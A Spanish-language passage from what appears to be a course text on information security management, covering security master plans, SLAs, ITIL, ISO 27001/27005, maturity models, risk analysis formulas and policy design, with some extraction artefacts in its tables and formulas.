Visión de la seguridad: describe lo que la entidad desea que llegue a ser la seguridad de
la información, revisándose de forma periódica y sirviendo de guía para la definición de
la estrategia de seguridad.
Estrategia de seguridad: la estrategia de seguridad se revisa periódicamente debido a
los permanentes cambios en el entorno y describe cómo alcanzar las metas definidas.
Concretamente contiene:
• De qué forma la seguridad da valor a la entidad, ligando sus iniciativas a

las de negocio.
• Cómo reducir los riesgos, teniendo en cuenta el cumplimiento
normativo y la reducción de costos.
• Cómo se protege la organización contra impactos de negocio, cómo
esta responde a la evolución de las amenazas y de qué forma se
pretende mejorar las medidas ya existentes: formación, tecnología,
concienciación, etc.
PLAN DIRECTOR DE SEGURIDAD

El Plan Director de Seguridad es una herramienta fundamental a la hora de implantar

la estrategia de seguridad en una organización en un periodo de tiempo que abarca
normalmente de 2 a 5 años como máximo.
Es un elemento básico que permite a una organización:
• Definir y establecer las directrices de seguridad de la información
que debe adoptar la organización en consonancia con los objetivos
corporativos.
Definir, planificar y formalizar las actividades en seguridad de la Información.
De forma simplificada, un Plan Director de Seguridad trata de determinar:
• El estado actual de la seguridad de la información en la organización y
de la gestión de los riesgos.
• El resultado deseado que se pretende alcanzar dentro de un periodo
de tiempo fijado en función de los objetivos de seguridad que deben ser
coherentes, medibles y alcanzables.
• El plan de proyectos que describa como se van a alcanzar dichos
objetivos.
Ilustración 7. Fases de un Plan Director de Seguridad
El modelo de seguridad deberá tener en cuenta:
• Los objetivos y la estrategia corporativa: resultado deseado que se

pretende alcanzar dentro de un periodo de tiempo fijado
• La gestión de los riesgos: Conocer los riesgos y cómo gestionarlos.
• Las necesidades del negocio: Primero fijar los objetivos de seguridad y
luego las medidas o controles de seguridad que se desarrollan como
parte del modelo.
• Los estándares y buenas prácticas del sector.
• Las circunstancias tecnológicas y operativas.
Para lograr cumplir los objetivos marcados, el plan de proyectos debe tener en cuenta
el conocimiento interno de la empresa, los recursos, el presupuesto y la tecnología
disponible.

2.2. Buenas prácticas de seguridad en la gestión de
servicios de TI
La gestión de los servicios de Tecnología de la Información (TI) ha evolucionado desde
una organización ad hoc centrada en la visión técnica de los recursos de TI a una
visión integradora que considera los aspectos humanos, sociales y tecnológicos que
intervienen en un servicio de TI.
Es un servicio a uno o más clientes, por un proveedor de servicios de TI. Un servicio de TI

se basa en el uso de tecnologías de la información y apoya al cliente en sus procesos
de negocio. Un servicio de TI se compone de una combinación de personas, procesos y
tecnología y debe definirse en un acuerdo de nivel de servicio.
La definición indica varios elementos fundamentales en la gestión de los servicios:
• En primer lugar, hace referencia al apoyo al cliente en sus tareas. Esta es

una consideración central y es especialmente importante, dado que un
fallo en un servicio de TI en muchas ocasiones implica que hay usuarios
que no pueden hacer su trabajo.
• En segundo lugar, un servicio tiene tres componentes: personas,
procesos y tecnología y estos tres elementos deben tenerse en cuenta
en la definición, diseño y evaluación de cada servicio.
• Por último, la definición hace referencia a los Acuerdos de Nivel de
Servicio (Service Level Agreement, SLA), que pueden entenderse como
los contratos entre los usuarios y proveedores del servicio, dando un
carácter de predictibilidad a los servicios y permitiendo una evaluación
del servicio no ambigua, dado que los niveles de calidad son explícitos
en los acuerdos.
Los Acuerdos de Nivel de Servicio (Service Level Agreement, SLA) son acuerdos
formales sobre la división de la responsabilidad de los medios de computación entre el
Departamento de Sistemas de Información (DSI) y los usuarios finales. Estos acuerdos
pueden considerarse contratos, y deben abarcar todos los recursos fundamentales de las
tecnologías de la información: hardware, software, personal, datos, redes y procedimientos.
De hecho, los SLA no son específicos de las relaciones de los DSI, sino que se utilizan para
todo tipo de relaciones de provisión de servicios. Se definen de manera general como un
protocolo plasmado normalmente en un documento de carácter legal por el que una
compañía que presta un servicio a otra se compromete a prestar el mismo trabajo bajo
unas determinadas condiciones y con prestaciones mínimas. Se utilizan también con
profusión en contratos de outsourcing.
La fundamental ventaja de un SLA es que las responsabilidades quedan claramente

definidas y los procesos para el funcionamiento diario también están determinados de
manera precisa.
SLA: garantía de disponibilidad de red.
Se define como tiempo en que el servidor tiene disponible la conectividad a internet en
el puerto de red asignado. La disponibilidad del servicio se calcula según la siguiente
fórmula:
Donde:
Es el tiempo de disponibilidad del servicio.
Es el tiempo total mensual.
Es el tiempo con pérdida total de conectividad. Este tipo de pérdida será igual
a la que transcurre desde la apertura de la incidencia, hasta el cierre de dicha
incidencia.
En caso de pérdida de disponibilidad real de este nivel de servicio, se aplicarán
las penalizaciones de la siguiente tabla de acuerdo con las condiciones de
penalización generales del contrato.
Tabla 5. Pérdida de disponibilidad real del servicio con base en las condiciones de penalización
generales del contrato.
PENALIZACIONES
99% > D ³ 98% NIVEL A
98% > D ³ 96% NIVEL B
96% > D ³ 90% NIVEL C
D ³ 90% NIVEL D
Cálculo del tiempo de caída: en el cálculo de esta magnitud se establecerá desde que
se ha dado noticia al DSI del problema. El tiempo de incidencia finaliza cuando el DSI
comprueba que dicho servicio se ha restaurado completamente. No se considera tiempo
de caída aquel debido a problemas derivados de un mal uso de la red o una mala
configuración de la red por parte del cliente.
LAS BUENAS PRÁCTICAS EN LOS SERVICIOS DE TI: ITIL

La práctica de la gestión de los servicios de TI maduró progresivamente durante los años
ochenta. El gobierno británico, guiado por la necesidad de una gestión más efectiva de
esos servicios, comenzó a recopilar las formas en las que las organizaciones con más éxito
gestionaban sus servicios. Esto llevó a la primera versión de la IT Infrastructure Library (ITIL)

al final de los ochenta, que no era otra cosa que un conjunto de libros documentando los
hallazgos de los estudios mencionados.
El Information Technology Service Management Forum (itSMF) es el único grupo de
usuarios internacionalmente reconocido e independiente dedicado a la gestión de
servicios TI, que surgió como un foro para que los usuarios de ITIL pudiesen intercambiar
experiencias y aprender colectivamente. Es propiedad de sus miembros y son ellos
quienes lo operan. El itSMF tiene gran influencia y contribuye a la industria de las mejores
prácticas y a los estándares a nivel mundial.
La primera filial del itSMF se fundó en el Reino Unido en 1991. El itSMF holandés (itSMF
Holanda) fue la siguiente, establecida en noviembre de 1993. Ahora existen filiales itSMF en
países como Sudáfrica, Bélgica, Alemania, Austria, Suiza, Canadá, Estados Unidos, Francia
y Australia, que cooperan con itSMF Internacional.
OGC (The Office of Government Commerce) es la Oficina independiente del Tesoro en el

Reino Unido (RU). El objetivo de la OGC es definir estándares y proporcionar las mejores
prácticas para el mercado del RU. La OGC es la dueña de ITIL® y el desarrollo de ITIL® v3
ha sido auspiciado por la OGC.
La APMG, o el Grupo APM Group, han sido contratados por la OGC para ser el proveedor
acreditado en los siguientes años. Él definirá el estándar de los exámenes, la provisión de
los exámenes, y entrenadores capacitados, materiales de capacitación y proveedores de
capacitación de ITIL® v3.
El principio fundamental de ITIL es el de recoger todas las prácticas que funcionan. Esta
aproximación se resume en unas características clave que pueden resumirse en las
siguientes:
• ITIL no es propietario: las prácticas de ITIL no son específicas de ningún

tipo de tecnología o de sector. Además, ITIL es propiedad del gobierno
británico, no estando por lo tanto en manos de ningún proveedor
concreto.
• ITIL no es prescriptivo: ITIL recoge prácticas maduras, probadas de
aplicabilidad general. Por su carácter genérico, no establece ningún tipo
de obligatoriedad o uso concreto de tecnologías o técnicas.
• ITIL consiste en las mejores prácticas: ITIL recoge las mejores prácticas a
nivel global, por lo tanto, es el resultado de la experiencia acumulada.
• ITIL consiste en buenas prácticas: No todas las prácticas en ITIL pueden
considerarse como las «mejores». Esto es una consecuencia del
carácter evolutivo de la práctica. Lo que hoy es lo mejor, mañana pasará
simplemente a ser bueno o común, dado que se habrán descubierto
formas mejores de hacer lo mismo o bien el entorno habrá cambiado.
ITIL abarca prácticas de soporte y de entrega del servicio. La siguiente figura las
esquematiza.

Ilustración 8. Esquema de gestión de servicios TI
Las prácticas que ITIL recoge tienen unas características comunes cuando se observa
su tipo y cómo las aplican las mejores organizaciones de servicio. Esas características
pueden resumirse en los siguientes puntos:
• Son predictivos en lugar de reactivos. Es decir, se basan en estudiar los
patrones de uso de los clientes o usuarios.
• Son consistentes y medibles. Las mejores prácticas son estables y
proporcionan predictibilidad a los servicios de TI.
• Son adaptables. Por último, las prácticas deben permitir su optimización
y mejora continua.
Tomemos como ejemplo la práctica de la «Gestión de la capacidad». Podemos definirla
cómo la práctica encargada de «asegurar que la infraestructura de TI se proporciona
cuando se necesita, en el volumen necesario y con el precio adecuado, garantizando su
uso eficiente».
Siguiendo el esquema anterior, como toda práctica ITIL, debe ser:
• Predictiva: esto se refleja, por ejemplo, en considerar que un factor
crítico de éxito en esta práctica es proporcionar previsiones de demanda
de TI precisas.
• Consistente: esto se refleja, por ejemplo, en la necesidad de
implementar políticas, procesos y procedimientos de gestión de la
capacidad.
• Medible: esto se refleja en los indicadores recomendados para la
evaluación del servicio. Para esta práctica, entre los KPI (key performance
indicators) tenemos, por ejemplo:

o Dólares en capacidad de TI no utilizada.
o Número de incidentes/violaciones de SLA debidos a la capacidad.
• Adaptable: entre las actividades encontramos implementar cambios
relacionados con la capacidad.
Es importante entender que las recomendaciones y directrices relativas a cada práctica

tienen en cuenta las cuatro características que acabamos de comentar.
EL PROCESO DE GESTIÓN DE LA SEGURIDAD EN ITIL

El proceso de gestión de la seguridad en ITIL se basa en la norma ISO 27001. Para diseñar
los procesos, las entradas son los requisitos que se formulan por parte de los clientes.
Estos requisitos se traducen en servicios de seguridad y de calidad de seguridad que
debe ser proporcionada en la sección de seguridad de los acuerdos de nivel de servicio.
El proceso de gestión de la seguridad en ITIL es complejo y abarca un buen número de
diferentes actividades. La siguiente tabla resume algunas de ellas.
Tabla 6. Procesos de gestión de la seguridad en ITIL
SUBPROCESO OBJETIVOS
Diseñar las medidas técnicas y organizativas
DISEÑO DE
necesarias para asegurar la disponibilidad,
CONTROLES DE
integridad y confidencialidad de recursos y servicios
SEGURIDAD
de información.
PRUEBAS DE Asegurar que los mecanismos de seguridad están

SEGURIDAD sujetos a pruebas regulares.
GESTIÓN DE
Detectar y combatir los ataques y las intrusiones, y
INCIDENTES DE
minimizar el daño de las brechas de seguridad.
SEGURIDAD
Revisar si las medidas y procedimientos de

REVISIÓN DE LA seguridad son coherentes con las percepciones
SEGURIDAD de riesgo del negocio, y si esas medidas y
procedimientos se revisan y evalúan regularmente
Respecto a los indicadores, la siguiente tabla describe indicadores típicos para este
proceso:
Tabla 7. Indicadores típicos para los procesos de la gestión de la seguridad en ITIL

KPI DESCRIPCIÓN
NÚMERO DE MEDIDAS Número de medidas de prevención

DE PREVENCIÓN implementadas en respuesta a amenazas a la
IMPLEMENTADAS seguridad identificadas
Tiempo transcurrido desde la identificación de

DURACIÓN DE LA
una amenaza hasta la implementación de una
IMPLEMENTACIÓN
contramedida adecuada
NÚMERO DE INCIDENTES
Número de incidentes, clasificados por
DE SEGURIDAD
severidad
IMPORTANTES
NÚMERO DE CAÍDAS
Número de incidentes que han causado
DEL NIVEL DE SERVICIO
disponibilidad del servicio de limitada o
RELACIONADAS CON LA
interrupción
SEGURIDAD
NÚMERO DE TEST DE Número de test de seguridad (y de procesos de

SEGURIDAD formación) llevados a cabo
NÚMERO DE PROBLEMAS
Número de problemas identificados en el
IDENTIFICADOS
transcurso de los test de seguridad
DURANTE LOS TEST
Es interesante detenerse a pensar cómo los KPI que se acaban de mencionar se

relacionan con los modelos económicos de la seguridad. Las medidas de prevención
son pre – incidente, así como los test, si bien el número de incidentes es post – incidente.
La orientación al servicio hace que uno de los KPI tenga que ver con el concepto de
disponibilidad de manera directa.
3. El estándar ISO 27001

El estándar UNE-ISO/IEC 27001:2013 Sistemas de Gestión de la Seguridad de la Información
(SGSI). Requisitos es el primero de la serie de estándares ISO 27000. Es la norma principal
de la familia, ya que establece los requisitos para la gestión del SGSI y su auditoría.

ANTECEDENTES DEL ESTÁNDAR ISO 27001: ISO/IEC BS7799
El Estándar Británico ISO-IEC BS7799-IT es un código aceptado internacionalmente en
la práctica de la seguridad de la información. El estándar aplica un método de cuatro
fases para implementar una solución de sistemas de administración de seguridad de
la información. La norma ISO 27001 puede considerarse como la última revisión de la
norma BS 7799:2002 Parte 2, de la que ya había en el mundo previamente alrededor de
2.000 certificados.
LA FAMILIA ISO 27000

La siguiente figura resume las normas de seguridad de la familia 27000. Por ejemplo, la
norma ISO 27002 detalla los requisitos de la norma 27001, proporcionando una guía de
buenas prácticas que describe los objetivos de control y controles en cuanto a seguridad
de la información con 14 dominios, 35 objetivos de control y 114 controles. No obstante, ISO
27002 no se considera una norma de certificación como 27001, sino una especificación de
apoyo o buenas prácticas.
Ilustración 9. Resumen de las normas de seguridad de la familia 27000
Por ejemplo, en la ISO 27002 se incluye el siguiente control: «Medios físicos en tránsito:
Los medios que contienen información debieran ser protegidos contra accesos no-
autorizados, mal uso o corrupción durante el transporte más allá de los límites físicos de
una organización» (ISO 27002, 2018). Lógicamente, este control solo deberá diseñarse en
caso de que se dé el citado tránsito.

INTRODUCCIÓN A LA NORMA 27001
La norma ISO 27001 describe los requisitos de un Sistema de Gestión de la Seguridad de
la Información (SGSI). Proporciona un marco común para la elaboración de las normas
de seguridad de cualquier tipo de organización, estableciendo un método de gestión
eficaz de la seguridad. Esta norma es la base del proceso de auditoría y certificación de
los sistemas de seguridad de información de las organizaciones.
El establecimiento del SGSI se realiza seleccionando una serie de controles elegidos en
función de su importancia en la gestión del sistema de seguridad.
La siguiente tabla resume la estructura de la norma y sus principales contenidos.
Tabla 8. Resumen de los principios contenidos de la norma y su estructura por capítulo
PLAN DE MEJORA PERSONAL
CAP. FORTALEZAS ACCIONES DE MEJORA
1 Alcance Establece el alcance y ámbito de la

aplicación de la norma
2 Referencias Detalla otras normas relacionadas
3 Términos y definiciones Proporciona las definiciones de la

terminología básica
4 Contexto de la organización Identifica los aspectos relevantes de la
organización de cara a la seguridad de
la información y se limita el alcance
5 Liderazgo Establece los requisitos de compromiso
de la dirección y de asignación de
recursos
6 Planificación Descripción de los objetivos de
seguridad y definición de la gestión de
los riesgos
7 Soporte Dotación de recursos para el
establecimiento y mejora del SGSI
8 Operación Verificación de la operación del SGSI y
del estado de los riesgos
9 Evaluación del desempeño Realización de auditorías internas y
revisiones del SGSI
10 Mejora Gestión de las no conformidades,
las acciones correctivas y la mejora
continua

En los procesos de un sistema de gestión de seguridad de la información se utiliza con
frecuencia el modelo PDCA (Planear, Hacer, Comprobar y Actuar).
Ilustración 10. Modelo PDCA en el SGSI
El proceso de planificación comienza con el diseño inicial del SGSI, incluyendo la

evaluación de riesgos inicial y cómo se tratarán. Una vez se han diseñado los diferentes
mecanismos de gestión (políticas, procedimientos, etc.) se ponen en marcha implantando
y ejecutando el SGSI.
En la fase de seguimiento y revisión será cuando se evalúe la marcha de este. Dependiendo
del nivel de madurez del SGSI en esta fase de verificación se incluirán auditorías (internas
o externas). Finalmente, a la luz de la evaluación realizada, se propondrán las mejoras al
SGSI que pasarán a una nueva fase de diseño.
Requisitos generales
La adopción de un sistema de gestión de seguridad de la información es una decisión
estratégica y se diseña e implanta de forma diferente en cada organización. Una
organización debe definir el alcance y los límites del sistema de gestión de seguridad
de la información de acuerdo con las características de la organización, su ubicación,
activos y tecnología.

Se deben establecer los objetivos de la política del sistema de gestión de seguridad de la
información, identificando los posibles riesgos o amenazas que se podrían producir.
El alcance del SGSI
En una organización pequeña, puede que el alcance del SGSI sea toda la organización.
No obstante, en organizaciones grandes no tiene por qué ser así. Por ejemplo, puede
que le alcance en una empresa de venta por internet abarca la parte de Comercio
electrónico, pero no el aprovisionamiento (si éste se realiza de manera tradicional,
sin conexión a internet). En cualquier caso, al determinar el alcance es preciso
indicar las localizaciones físicas afectadas (oficinas, departamentos), las funciones
que quedan incluidas y también los elementos tecnológicos cubiertos. Estos últimos
se pueden definir por ejemplo mediante un diagrama de red.
REQUISITOS DE DOCUMENTACIÓN
La documentación del sistema de gestión de seguridad de la información deberá incluir
la política, alcance y objetivos del SGSI, así como los diferentes procedimientos y
controles de seguridad del sistema.
La documentación será más o menos amplia dependiendo de la organización y de
las diferentes actividades que desarrolle. Por tanto, el alcance y complejidad de los
requerimientos de seguridad variarán en función de estas circunstancias.
La dirección debe aprobar un documento de política de seguridad de la información,
que deberá publicar y comunicar a todos los empleados y entidades externas relevantes.
Se deben aprobar los documentos previamente a su distribución, revisando y actualizando
los documentos según las necesidades requeridas, y siempre que se garantice que los
documentos están periódicamente actualizados.
Ilustración 11. Jerarquía de la documentación
COMPROMISO DE LA DIRECCIÓN
La Norma ISO 27001 especifica la obligación de suministrar evidencias del compromiso
planteado, tanto en el desarrollo como en la implantación y mejora del sistema, en los
siguientes aspectos:
• En el proceso de comunicación interna al personal de la organización
de la gestión de la seguridad de la información en la empresa.

• En el establecimiento de la política y los objetivos del sistema de
gestión de seguridad de la información de la empresa.
• En la revisión periódica del desempeño del sistema de gestión.
• En el aseguramiento de la disponibilidad de los recursos necesarios
para la plena efectividad del sistema.
RESPONSABILIDADES
Las responsabilidades y sus correspondientes autoridades deben estar perfectamente
definidas en cualquier organización o empresa.
La Norma ISO requiere que la alta dirección asegure que se cumplan estos requisitos
y que las responsabilidades sean comunicadas dentro de la organización, valorando el
tamaño, complejidad y cultura de la organización.
Se puede nombrar un representante de la dirección que tendrá la responsabilidad de:
• Asegurar que los procesos del sistema de gestión de seguridad de la
información se implanten y funcionen.
• Informar a la alta dirección sobre el desempeño del sistema y de
cualquier oportunidad de mejora.
REVISIÓN POR LA DIRECCIÓN

La dirección debe desarrollar una actividad de revisión que implique la verificación de
la eficacia y efectividad del sistema de gestión de seguridad de la información para
asegurar su plena validez.
El proceso de revisión por la dirección no debería ser un planteamiento realizado
solamente para satisfacer los requisitos de la norma o de los auditores, sino que debería
ser una parte integral de los procesos de gestión de la organización.
4. Modelos de madurez
para la seguridad de la
información
Un modelo de madurez sirve para situar y evaluar el grado de desarrollo de una gestión
sistemática, predecible y optimizable. Estos modelos se han popularizado en el contexto
del desarrollo de software, pero poco a poco han sido adaptados a otros dominios,

incluyendo el de la seguridad de la información.
En lo que sigue introducimos uno de esos modelos, el CMMI, quizá el más conocido y
extendido en la actualidad. Es importante tener en cuenta que las ideas del CMMI se han
aplicado recientemente a los servicios.
Posteriormente describimos un modelo de madurez específico de la seguridad de la
información.
EL MODELO DE MADUREZ CMMI

El modelo CMMI, acrónimo del inglés Capability Madurity Model Integration, es una
evolución de un modelo anterior denominado CMM inicialmente desarrollado por el
Instituto de Ingeniería del Software (SEI) de la Universidad Carnegie Mellon.
El SEI llevó a cabo el encargo de desarrollar un modelo de calidad que sirviera como
base para establecer un sistema de capacitación de las compañías que suministraban
software al gobierno de los Estados Unidos. Dicho modelo fue definido como:
«Un enfoque para la mejora de procesos que proporciona a una organización los
elementos esenciales para llevar a cabo sus procesos de manera efectiva. Puede
utilizarse para guiar la mejora de procesos en un proyecto, en un departamento, o
en una organización completa. CMMI ayuda a integrar funciones de la organización
tradicionalmente separadas, a establecer prioridades y objetivos en la mejora de
procesos, proporciona guías para los procesos de calidad y sirve como punto de
referencia para la evaluación de los procesos actuales».
Nótese que CMMI no es un proceso de desarrollo de software, sino más bien una guía
que describe las características que hacen efectivo a un proceso. Las ideas que aporta
pueden ser, por tanto, utilizadas como un conjunto de buenas prácticas, como un marco
para la organización y priorización de actividades, o como una forma de alinear los
objetivos de la organización con los objetivos del proceso en estudio.
CMMI se interesa por la mejora de los procedimientos y métodos (procesos) que las
personas de una organización llevan a cabo con ayuda de tecnología y otras herramientas,
ya que, si los procesos no están correctamente definidos, son maduros y ampliamente
conocidos, ni las más cualificadas personas serán capaces de rendir a su mejor nivel aun
disponiendo de las mejores herramientas.
EL MODELO O-ISM3
El Open Group desarrolló un modelo de madurez denominado Open Group Security
Management Maturity Model (O-ISM3), que permite el diseño de sistemas de gestión de
la seguridad alineados con la misión de la organización empresarial y el cumplimiento
de las necesidades.
La nueva norma permite a las organizaciones priorizar y optimizar las inversiones en
seguridad de la información, así como permitir la mejora continua de los sistemas que
utilizan métricas bien definidas.
El modelo se basa en la consideración de tres elementos fundamentales en la seguridad
de la información:

• Gestión de riesgos.
• Controles de seguridad.
• Gestión de la seguridad, mediante un sistema de políticas y
herramientas que las implementan.
Por otro lado, el estándar se basa en las siguientes definiciones:
• Proceso: los procesos tienen capacidades que se realizan mediante

prácticas de gestión.
• Capacidad: las métricas de un proceso revelan las capacidades de este.
• Madurez (grado de): ciertos conjuntos de procesos seleccionados según
ciertas capacidades permiten clasificar a la organización en un nivel de
madurez.
4.1. Programas de gestión de la seguridad

Como ya sabemos, el objetivo de la gestión de la seguridad es garantizar la
confidencialidad, integridad y disponibilidad de los recursos de información de la
organización.
El programa de gestión de la seguridad es un conjunto de actividades planificadas

dentro de una organización para garantizar la disponibilidad, confidencialidad e
integridad de los recursos de información.
Los programas deben ser comunicados de forma entendible a todos los empleados.
Un programa no es una acción concreta, sino un área de gestión orientada a la
mejora continua. La importancia de la seguridad de la información ha dado lugar a la
profesionalización, materializada en el rol del Responsable de Seguridad de Información
(RSI), CISO (Chief Information Security Officer) o denominación equivalente.
La gestión de la seguridad se materializa en políticas, estándares, líneas base y
procedimientos.
• Políticas: establecen las directrices generales.

• Estándares: establecen las herramientas requeridas.
• Líneas base: establecen los parámetros que se utilizarán.
• Procedimientos: establecen las guías paso a paso que se deben realizar
diariamente.
Es importante resaltar la importancia de los programas de concienciación (o educación)

de los empleados, necesarios para hacer efectiva la implementación de políticas,
estándares y procedimientos.

En cualquier caso, los programas de gestión de la seguridad comienzan por un proceso
fundamental, la gestión de riesgos, que establece los objetivos de la gestión analizando
las amenazas y su potencial impacto.
Posteriormente, esos riesgos analizados serán el criterio para implementar diferentes
tipos de controles.
4.2. La gestión de riesgos

Un riesgo es esencialmente la posibilidad de ocurrencia de un evento no deseado, de
consecuencias negativas, en nuestro contexto, sobre la seguridad de los recursos de
información. Los riesgos deben ser estudiados y analizados, para poder tomar decisiones
sobre los mismos. Las decisiones pueden ser básicamente tres:
• Asumir el riesgo tal cual.

• Implementar algún tipo de acción para mitigar el riesgo.
• Externalizar o transferir el coste del riesgo, normalmente mediante la
contratación de algún tipo de seguro que actuaría como compensación
económica en caso de ocurrencia de este. Otra opción es la de
subcontratar ciertos servicios a terceros, que se hacen responsables del
riesgo.
• Una cuarta opción sería, lógicamente, la de evitar el riesgo dejando de
utilizar ciertos recursos o cesando en las actividades asociadas al riesgo,
pero lógicamente, esto tiene el coste de oportunidad de no obtener
beneficios de la actividad.
La primera opción obviamente solo es viable si la organización es capaz de absorber el

coste de la materialización del riesgo. En el caso de seguir la segunda opción, típicamente
la organización debe realizar un análisis coste-beneficio, particularmente calcular el
riesgo residual.
La gestión de riesgo es el conjunto de procesos para identificar, analizar y evaluar los

riesgos y para tomar las decisiones sobre su asunción, mitigación o transferencia.
Las preguntas sobre el análisis y gestión del riesgo pueden resumirse en las siguientes:
• ¿Qué podría sucevder (cuáles son los eventos indeseados o amenazas)?

• Si se da el evento, ¿cuán malo puede ser ( impacto de la amenaza)?
• ¿Con qué frecuencia puede ocurrir (frecuencia de amenaza, por ejemplo,
anualmente)?
• ¿Cuán seguros estamos de las respuestas a las tres primeras preguntas
(reconocimiento de nuestra incertidumbre)?

Una vez los riesgos han sido analizados y evaluados, la gestión debe responder a las
siguientes preguntas fundamentales:
• ¿Qué se puede hacer (mitigación de riesgos)?

• ¿Cuánto va a costar (por intervalos de tiempo, por ejemplo, anuales)?
• ¿Es rentable (análisis coste/beneficio)?
En lo que sigue profundizamos en los elementos y actividades fundamentales de la

gestión de riesgos en la seguridad de la información.
ALGUNAS DEFINICIONES PREVIAS

La terminología en la gestión de los riesgos, para evitar ambigüedades, debe basarse en
estándares como ISO 17799. Algunas definiciones previas importantes son las siguientes:
• Amenaza (threat): un peligro potencial a un recurso.

• Fuente/agente de la amenaza (threat-source/agent): algo o alguien que
tiene capacidad potencial para materializar la amenaza.
• Vulnerabilidad: una debilidad o fallo en un recurso.
• Exposición: una oportunidad para que una amenaza cause un daño. En
cuanto a los controles, suelen diferenciarse los siguientes:
o Mecanismos de mitigación técnicos (por ejemplo, un firewall) o no-
técnicos (administrativos y físicos): las medidas administrativas incluyen
por ejemplo políticas y procedimientos y las físicas por ejemplo alarmas,
cerraduras o detectores de fuego.
o Salvaguardas (safeguard): controles preventivos y proactivos.
o Contramedidas: controles correctivos (reactivos).
PROCESOS EN LA GESTIÓN DE RIESGOS DE LA INFORMACIÓN

Existen diferentes modelos y estándares sobre los procesos en la gestión de riesgos. Por
ejemplo, el estándar NIST SP-830 agrupa los procesos en tres fases:
• Evaluación del riesgo (risk assessment): a su vez, se considera dentro de

esta fase otras, incluyendo:
o Cuantitativa (estimando el valor monetario de la ocurrencia de las
amenazas)
o Cualitativa (basada en escenarios).
• Implementación de controles.
• Evaluación continua de los controles.

Independientemente del modelo de procesos o buenas prácticas que se utilice, todos
ellos comparten una estimación de la probabilidad de ocurrencia del riesgo y una
sugerencia de contramedidas que puedan utilizarse y que se implementarán mediante
controles.
ANÁLISIS DE RIESGOS CUANTITATIVO
CONCEPTO FORMULACIÓN
Factor de exposición (exposure Porcentaje de pérdida de valor
factor, FE) de un recurso asociado a una
amenaza
Expectativa de pérdida (single los Valor del recurso multiplicado por FE
expectancy, SLE)
Tasa de ocurrencia anualizada Frecuencia de la ocurrencia de la
(annualized rate of occurency, amenaza anual
ARO)
Expectativa de pérdida anual SLE*ARO
(annualized los expectancy, ALO)
Tabla 9 Medidas a tomar ante el análisis de riesgos cuantitativo.
El análisis de riesgos cuantitativo trata de asignar valores cuantitativos (por ejemplo,

unidades monetarias) a los diferentes elementos. Para ello, hay que comenzar haciendo
una valoración económica de los recursos. A partir de esa valoración, se establecen una
serie de medidas, la siguiente tabla resume las principales.
El problema fundamental del análisis es la dificultad de medir el valor de los recursos.

Este valor puede estimarse de diferentes formas, no excluyentes:
• El coste inicial y continuo (para una organización) de la compra,
concesión de licencias, el desarrollo y el mantenimiento.
• El valor del recurso para el mantenimiento del modelo de negocio
o la ventaja competitiva, o el valor que aporta al negocio en su
funcionamiento.
• El valor de mercado del recurso, si se puede evaluar. Por ejemplo, el
valor por el que se podría vender un secreto industrial.
4.3. Diseño de políticas de seguridad

Las políticas tienen muchas utilidades, por ejemplo, pueden ser un salvavidas durante
un desastre o podrían ser un requisito de una función reguladora. La política también
puede proporcionar protección contra la responsabilidad debida a un trabajador o

definir acciones para el control de los secretos comerciales.
LOS DIFERENTES TIPOS DE POLÍTICAS

El término «política» es uno de esos términos que pueden significar varias cosas en
seguridad de la información. Por ejemplo, existen políticas de seguridad en servidores,
que se refieren al control de acceso y la información de enrutamiento. Los estándares,
procedimientos y directrices también se conocen como políticas en el sentido más
amplio de la seguridad.
Aquí hacemos referencias a las políticas como controles administrativos de carácter
temático, a veces denominadas políticas funcionales. Por ello adoptamos la siguiente
definición de política. Estas políticas detallan las políticas generales de la organización.
LAS POLÍTICAS Y SU IMPORTANCIA
La política de seguridad de la información es un plan de alto nivel que describe los

objetivos de los procedimientos.
Por lo tanto, las políticas no son directrices o estándares, ni tampoco procedimientos.

Las políticas describen la seguridad en términos generales y no específicos. Pueden
considerarse las plantillas o requisitos generales que determinan cómo se diseñarán e
implementarán los diferentes elementos de la seguridad.
La diferencia entre política e implementación es importante. Por ejemplo, si una política
estableciese que el login único debe hacerse con un producto concreto de una empresa,
cuando el mercado evolucione, puede que otros productos sean mejores. No parece
razonable que el objetivo (que es lo que define la política) esté ligado a un producto o
tecnología concreta, al menos en la mayoría de los casos. Ahora bien, la política sí que
puede indicar la obligatoriedad de que, independientemente de la elección de producto
final, se documenten las razones de por qué se ha seleccionado.
El diseño de políticas es importante porque estas definen los objetivos de la seguridad.
Además, la participación de la dirección en la definición de las políticas proporciona
un mensaje claro sobre la implicación ycompromiso de la organización en sus
niveles directivos. Las políticas, salvo excepciones convenientemente documentadas y
aprobadas, se aplican a la organización entera, por lo que facilitan tener unos estándares
de seguridad coherentes, y esto es algo que los clientes pueden apreciar y hace la
gestión más sencilla.
Por último, las políticas son útiles para gestionar los litigios. Si se amonesta a un empleado
por una acción relacionada con la seguridad, y no había política escrita, es complicado
justificar esa amonestación.

Desde una perspectiva más pragmática, la ausencia de políticas escritas
correctamente simplemente impide la evaluación externa y la auditoría.
UN EJEMPLO PARA COMENZAR

Terminamos esta sección con un ejemplo de política y un análisis de su forma, tomado de
comunidad SANS, sus diferencias con otras herramientas de gestión y sus implicaciones.
El documento está disponible en la dirección web: http://www.sans.org/
security- resources/policies/web-app-sec-a-pol.pdf
En la política anterior podemos apreciar una estructura general que suele darse de
manera explícita o implícita:
Ilustración 32. Estructura de la política anterior

Además de lo anterior, la política incluye una sección de definiciones para hacer precisa
la política en sí, así como referencias. Finalmente, dado que las políticas provienen de
la implementación de la gestión que es un ciclo de mejora continua, deben tener algún
mecanismo de seguimiento de versiones o revisiones.
Estos son los elementos fundamentales que se encuentran de un modo u otro en las
políticas. Además de lo anterior, podemos apreciar, en este caso, cómo se reutilizan
estándares, concretamente, definiciones de OWASP.
En este caso, esta política llega a detallar herramientas de evaluación concretas. Este
es un caso especial, dado que en muchas organizaciones esto se especifica en los
procedimientos o estándares, dejando la política en sí en un nivel más general. No obstante,
es importante resaltar que esta política deberá tener después guías de implementación
más detalladas en un procedimiento o varios.
5.La ISO 27005:2011 y su

adaptación al NIS SP 800-30
5.1. ISO/IEC 27005:2018
ISO/IEC 27005:2011 Information technology —Security techniques— Information security risk

management fue publicada en 2011, se apoya en los conceptos generales especificados
en la ISO/IEC 27001 del ciclo PDCA, está diseñada para proporcionar las directrices en la
ardua tarea del enfoque basado en riesgos y describe detalladamente la evaluación
y tratamiento de riesgos. Esta norma no es una metodología de análisis de riesgos,
sino que describe las fases recomendadas de análisis incluyendo el establecimiento,
la evaluación, el tratamiento, la aceptación, la comunicación, la monitorización y la
revisión del riesgo. No es una norma certificable y se engloba dentro de las normas que
